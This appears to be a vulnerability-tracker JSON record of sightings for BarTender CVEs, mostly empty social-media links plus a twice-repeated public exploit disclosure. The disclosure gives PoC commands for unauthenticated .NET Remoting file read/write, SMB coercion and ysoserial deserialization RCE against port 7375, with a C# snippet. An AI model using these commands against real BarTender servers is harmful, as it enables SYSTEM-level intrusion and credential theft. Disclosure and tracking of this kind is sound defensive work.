{"vulnerability": "cve-2026-2555", "sightings": [{"uuid": "cd8e7be0-1999-4ef9-b111-4a091e29642a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjmyveiys2b", "content": "", "creation_timestamp": "2026-02-23T12:16:34.060688Z"}, {"uuid": "acaffcaa-7d2f-4f86-b32f-588d01e49294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjoqaj3fc2b", "content": "", "creation_timestamp": "2026-02-23T12:47:31.334668Z"}, {"uuid": "87288aea-fa86-4176-8e77-b6b8935794dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfjqjzcgi22b", "content": "", "creation_timestamp": "2026-02-23T13:19:49.502266Z"}, {"uuid": "6e58ac38-5521-44c5-93ae-e360aa12e594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25556", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfh6qh6qa22o", "content": "", "creation_timestamp": "2026-02-22T12:55:58.325733Z"}, {"uuid": "cc4d92d4-34bf-4b60-b90a-f352ba5e3282", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3mhgtc4xz232q", "content": "", "creation_timestamp": "2026-03-19T20:21:28.437363Z"}, {"uuid": "a71b2352-e5d0-4de3-9250-385ae2ddf5d4", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3mhg5uqiygc2q", "content": "", "creation_timestamp": "2026-03-19T13:58:10.841990Z"}, {"uuid": "7bdb1798-0b47-43bd-bacc-982e806eb1c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25554", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3mhgzdfpkbi2c", "content": "", "creation_timestamp": "2026-03-19T22:09:33.675478Z"}, {"uuid": "d80f3f73-d570-4ec6-a219-4ecd5d2f3b92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-25554", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mhkzdcc3tm2i", "content": "", "creation_timestamp": "2026-03-21T12:20:08.809317Z"}, {"uuid": "e8699c57-1d83-45b9-a6ea-6fa46a48037b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25550", "type": "seen", "source": "https://gist.github.com/VAMorales/dde5b1c0415a8505ccd6fafdb095a618", "content": "# 1. Exploit Title: Seagull Scientific BarTender - Unauthenticated Arbitrary File Read/Write + RCE & SMB coercion via .NET Remoting\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25550](https://www.cve.org/cverecord?id=CVE-2026-25550)\n## Exploit Authors: Victor A. 
Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10\n\n### Description\nBarTender exposes a deprecated .NET Remoting TCP channel running in secure mode on port 7375 to all interfaces via the BtSystem.Service.exe Service executable. This can be exploited using anonymous authentication on the .NET TCP remoting endpoint that varies by version to coerce the target to an attacker-specified SMB share or to arbitrarily read/write files to the server in the context of NT AUTHORITY\\SYSTEM. By modifying the PoC of Code-White's RemotingClient_MBRO.exe program to implement a custom channel sink to redirect .NET Remoting traffic to the correct host and run in secure mode, an unauthenticated remote attacker can exploit .NET Remoting object unmarshalling techniques to read arbitrary files from the server filesystem, write attacker-controlled files to the server, or coerce NTLMv2 authentication to an attacker-controlled host, enabling sensitive credential disclosure, denial of service, remote code execution, or lateral movement depending on service account privileges and network environment.\n\n### PoC\nBarTender 2019 <= R10\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton \\\\\\file`\n\nBarTender 2016 <= R9\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem \\\\\\file`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            
if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n```\n\n# 2. Exploit Title: Seagull Scientific BarTender - Unauthenticated .NET Remoting Deserialization + RCE\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25551](https://www.cve.org/cverecord?id=CVE-2026-25551)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10, 2021 R1 through 12.0.1\n\n### Description\nBarTender registers a .NET remoting TCP channel on port 7375 running in secure mode exposed to all interfaces with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full. An unauthenticated attacker can generate a malicious serialized payload and send it to the .NET remoting endpoint using anonymous authentication to obtain Remote Code Execution on the server in the context of NT AUTHORITY\\SYSTEM.\n\nBarTender versions from 2021 R1 onwards restricted the .NET remoting TCP channel to bind to localhost only. 
Despite this change, the service is still registered with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full, which can still be leveraged to perform local privilege escalation to elevate a low-privileged user to NT AUTHORITY\\SYSTEM.\n\n### PoC\n`.\\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c \"\" -o base64`\n\nBarTender 2019 <= R10\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/DataServiceSingleton raw `\n\nBarTender 2016 <= R9\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/BarTenderSystem raw `\n\nBarTender 2021 R1 through 12.0.1\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://localhost:7375/DataServiceSingleton raw `", "creation_timestamp": "2026-06-03T11:43:22.000000Z"}, {"uuid": "9ba4ca2a-991c-44ab-8970-95247578014a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25551", "type": "seen", "source": "https://gist.github.com/VAMorales/dde5b1c0415a8505ccd6fafdb095a618", "content": "# 1. Exploit Title: Seagull Scientific BarTender - Unauthenticated Arbitrary File Read/Write + RCE & SMB coercion via .NET Remoting\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25550](https://www.cve.org/cverecord?id=CVE-2026-25550)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10\n\n### Description\nBarTender exposes a deprecated .NET Remoting TCP channel running in secure mode on port 7375 to all interfaces via the BtSystem.Service.exe Service executable. 
This can be exploited using anonymous authentication on the .NET TCP remoting endpoint that varies by version to coerce the target to an attacker-specified SMB share or to arbitrarily read/write files to the server in the context of NT AUTHORITY\\SYSTEM. By modifying the PoC of Code-White's RemotingClient_MBRO.exe program to implement a custom channel sink to redirect .NET Remoting traffic to the correct host and run in secure mode, an unauthenticated remote attacker can exploit .NET Remoting object unmarshalling techniques to read arbitrary files from the server filesystem, write attacker-controlled files to the server, or coerce NTLMv2 authentication to an attacker-controlled host, enabling sensitive credential disclosure, denial of service, remote code execution, or lateral movement depending on service account privileges and network environment.\n\n### PoC\nBarTender 2019 <= R10\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/DataServiceSingleton \\\\\\file`\n\nBarTender 2016 <= R9\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem C:\\Windows\\win.ini`\n\n`.\\RemotingClient_MBRO.exe tcp://:7375/BarTenderSystem \\\\\\file`\n\nSnippet of the custom channel fix code:\n\n```csharp\ninternal class ChannelUriFixingClientChannelSinkProvider : IClientChannelSinkProvider\n    {\n        private readonly string publicHost;\n        private readonly int publicPort;\n\n        public IClientChannelSinkProvider Next { get; set; }\n\n        public ChannelUriFixingClientChannelSinkProvider(Uri objUrl)\n        {\n            if (objUrl == null) throw new ArgumentNullException(nameof(objUrl));\n\n            this.publicHost = objUrl.Host;\n            this.publicPort = objUrl.Port;\n        }\n```\n\n# 2. 
Exploit Title: Seagull Scientific BarTender - Unauthenticated .NET Remoting Deserialization + RCE\n## Disclosure Date: 06/03/2026\n## CVE ID: [CVE-2026-25551](https://www.cve.org/cverecord?id=CVE-2026-25551)\n## Exploit Authors: Victor A. Morales and Jan Rodriguez of GM Sectec, Corp.\n## Vendor Homepage: https://portal.seagullscientific.com/downloads/bartender\n## Known Affected Versions: 2016 <= R9, 2019 <= R10, 2021 R1 through 12.0.1\n\n### Description\nBarTender registers a .NET remoting TCP channel on port 7375 running in secure mode exposed to all interfaces with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full. An unauthenticated attacker can generate a malicious serialized payload and send it to the .NET remoting endpoint using anonymous authentication to obtain Remote Code Execution on the server in the context of NT AUTHORITY\\SYSTEM.\n\nBarTender versions from 2021 R1 onwards restricted the .NET remoting TCP channel to bind to localhost only. 
Despite this change, the service is still registered with the unsafe BinaryServerFormatterSinkProvider class and a TypeFilterLevel value of Full, which can still be leveraged to perform local privilege escalation to elevate a low-privileged user to NT AUTHORITY\\SYSTEM.\n\n### PoC\n`.\\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c \"\" -o base64`\n\nBarTender 2019 <= R10\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/DataServiceSingleton raw `\n\nBarTender 2016 <= R9\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://:7375/BarTenderSystem raw `\n\nBarTender 2021 R1 through 12.0.1\n\n`.\\ExploitRemotingService.exe -s --user=\"\" --pass=\"\" tcp://localhost:7375/DataServiceSingleton raw `", "creation_timestamp": "2026-06-03T11:43:22.000000Z"}, {"uuid": "252a601f-a137-4fb0-920a-6178f9e04f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-25550", "type": "seen", "source": "https://bsky.app/profile/hugovalters.bsky.social/post/3mniquk35ws2f", "content": "CVE-2026-25550 - Critical RCE in Seagull BarTender. Unpatched flaw in .NET Remoting service on TCP 7375. CVSS 9.8. No fix available. Disable service or restrict network access immediately. #CVE #seagull #infosec\n\nhttps://www.valtersit.com/cve/CVE-2026-25550/", "creation_timestamp": "2026-06-04T23:14:34.487415Z"}]}